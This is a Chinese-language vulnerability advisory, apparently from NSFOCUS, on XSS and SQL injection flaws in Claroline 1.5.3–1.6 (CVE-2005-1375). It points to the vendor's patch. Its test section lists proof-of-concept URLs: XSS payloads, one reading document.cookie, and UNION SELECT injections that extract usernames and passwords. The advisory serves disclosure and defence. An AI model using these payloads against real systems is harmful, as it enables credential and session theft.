安全研究

安全漏洞
Claroline E-Learning应用多个远程输入验证漏洞

发布日期:2005-05-02
更新日期:2005-05-02

受影响系统:
Claroline Claroline 1.5.3 - 1.6
描述:
BUGTRAQ  ID: 13407
CVE(CAN) ID: CVE-2005-1375

Claroline E-Learning Application是一种基于Web网络教学系统。

Claroline在处理用户请求时存在多个输入验证漏洞,远程攻击者可能利用这些漏洞非授权操作数据库,在用户浏览器中执行恶意代码,造成信息泄露或数据破坏。

Claroline的多个脚本没有充分检查过滤用户的参数数据,远程攻击者可以利用来执行SQL注入、跨站脚本执行等攻击。

<**>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http:///www.example.com/claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
http:///www.example.com/claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
http:///www.example.com/claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http:///www.example.com/claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/*
http:///www.example.com/claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1--

建议:
厂商补丁:

Claroline
---------
目前厂商已经在最新版本的软件中修复了这个安全问题,请到厂商的主页下载:

http://www.claroline.net/

浏览次数:2671
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障